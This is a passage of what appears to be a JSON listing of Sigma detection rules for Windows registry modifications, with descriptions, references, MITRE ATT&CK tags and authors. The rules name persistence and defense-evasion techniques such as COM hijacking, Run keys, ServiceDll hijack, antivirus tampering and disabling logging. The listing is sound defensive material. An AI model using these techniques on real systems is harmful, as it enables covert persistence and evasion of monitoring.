"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2021/06/10", - "filename": "registry_set_outlook_registry_todaypage.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the manipulation of persistent URLs which can be malicious", - "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "value": "Persistent Outlook Landing Pages", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - 
"https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2021/06/09", - "filename": "registry_set_outlook_registry_webview.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Change outlook email security settings", - "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", - "value": "Change Outlook Security Setting in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", - "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2021/12/28", - "filename": "registry_set_outlook_security.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential persistence using Appx DebugPath", - "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", - "value": "Windows Registry Persistence DebugPath", - "meta": { - "refs": [ - "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", - "https://github.com/rootm0s/WinPwnage", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" - ], - "tags": [ - "attack.persistence", - 
"attack.t1546.015" - ], - "creation_date": "2022/07/27", - "filename": "registry_set_persistence_appx_debugger.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", - "value": "Persistence Via AutodialDLL", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", - "https://persistence-info.github.io/Data/autodialdll.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/10", - "filename": "registry_set_persistence_autodial_dll.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "value": "COM Hijacking For Persistence With Suspicious Locations", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/07/28", - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Probable legitimate 
applications. If you find these please add them to an exclusion list" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "value": "Persistence Via MyComputer Key and SubKeys", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/09", - "filename": "registry_set_persistence_mycomputer.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking", - "meta": { - "refs": [ - "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", - "https://attack.mitre.org/techniques/T1546/015/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2020/04/14", - "filename": "registry_set_persistence_search_order.yml", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, C\u00e9dric Hien", - "level": "medium", - "falsepositive": [ - "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", - "value": "Persistence Via TypedPaths", - "meta": { - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/22", - "filename": "registry_set_persistence_typed_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_policies_associations_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - 
{ - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_policies_attachments_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects that a powershell code is written to the registry as a service.", - "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "value": "PowerShell as a Service in Registry", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "registry_set_powershell_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adds a RUN key that contains a powershell keyword", - "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "value": "Powershell in Windows Run Keys", - "meta": { - "refs": [ - 
"https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2022/03/17", - "filename": "registry_set_powershell_in_run_keys.yml", - "author": "frack113, Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate admin or third party scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", - "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/04/02", - "filename": "registry_set_powershell_logging_disabled.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a new custom protocole handler is registered", - "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "value": "Newly Registered Protocol Handler", - "meta": { - "refs": [ - 
"https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/30", - "filename": "registry_set_register_custom_protocol_handler.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate applications registering a new custom protocol handler" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "uuid": "8023f872-3f1d-4301-a384-801889917ab4", - "value": "Usage of Renamed Sysinternals Tools - RegistrySet", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": 
"2022/08/20", - "filename": "registry_set_scrobj_dll_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use of the dll." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "value": "ScreenSaver Registry Key Set", - "meta": { - "refs": [ - "https://twitter.com/VakninHai/status/1517027824984547329", - "https://twitter.com/pabraeken/status/998627081360695297", - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2022/05/04", - "filename": "registry_set_scr_file_executed_by_rundll32.yml", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "level": "medium", - "falsepositive": [ - "Legitimate use of screen saver" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", - "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "value": "ServiceDll Hijack", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/02/04", - "filename": "registry_set_servicedll_hijack.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts", - "Installation of a service" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "value": "Registry Explorer Policy Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/03/18", - "filename": "registry_set_set_nopolicies_user.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility 
Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "value": "Registry Key Creation or Modification for Shim DataBase", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.011" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_shim_databases_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", - "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", - "value": "SilentProcessExit Monitor Registration", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ], - "creation_date": "2021/02/26", - "filename": "registry_set_silentprocessexit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - 
"description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "value": "Persistence Via New SIP Provider", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/codesigning.html", - "https://github.com/gtworek/PSBits/tree/master/SIP", - "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1553.003" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_sip_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate SIP being registered by the OS or different software." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "value": "Tamper With Sophos AV Registry Keys", - "meta": { - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/02", - "filename": "registry_set_sophos_av_tamaper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" 
to \"0\" in order to hide user account.", - "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "value": "Hide User Account Via Special Accounts Reg Key", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": "2022/07/12", - "filename": "registry_set_special_accounts.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", - "value": "Activate Suppression of Windows Security Center Notifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_suppress_defender_notifications.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "value": "Suspicious Values In App Paths Default Property", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ], - "creation_date": "2022/08/10", - "filename": "registry_set_susp_app_paths_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "value": "Suspicious Keyboard Layout Load", - "meta": { - "refs": [ - "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", - "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2019/10/12", - "filename": "registry_set_susp_keyboard_layout_load.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "uuid": "e0813366-0407-449a-9869-a2db1119dc41", - "value": "Suspicious Printer Driver Empty Manufacturer", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1410545674773467140", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "creation_date": "2020/07/01", - "filename": "registry_set_susp_printer_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "uuid": 
"b7916c2a-fa2f-4795-9477-32b731f70f11", - "value": "Registry Persistence via Explorer Run Key", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2018/07/18", - "filename": "registry_set_susp_reg_persist_explorer_run.yml", - "author": "Florian Roth, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "value": "New RUN Key Pointing to Suspicious Folder", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2018/08/25", - "filename": "registry_set_susp_run_key_img_folder.yml", - "author": "Florian Roth, Markus Neis, Sander Wiebing", - "level": "high", - "falsepositive": [ - "Software using weird folders for updates" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", - "value": "Suspicious Service Installed", - "meta": { - "refs": [ - 
"https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ], - "creation_date": "2019/04/08", - "filename": "registry_set_susp_service_installed.yml", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "level": "medium", - "falsepositive": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "value": "Modify User Shell Folders Startup Value", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" - ], - "creation_date": "2022/10/01", - "filename": "registry_set_susp_user_shell_folders.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "value": "Scheduled TaskCache Change by Uncommon Program", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", 
- "https://labs.f-secure.com/blog/scheduled-task-tampering/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ], - "creation_date": "2021/06/18", - "filename": "registry_set_taskcache_entry.yml", - "author": "Syed Hasan (@syedhasan009)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence method using windows telemetry", - "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "value": "Registry Persistence Mechanism via Windows Telemetry", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2020/10/16", - "filename": "registry_set_telemetry_persistence.yml", - "author": "Lednyov Alexey, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "value": "RDP Sensitive Settings Changed to Zero", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - 
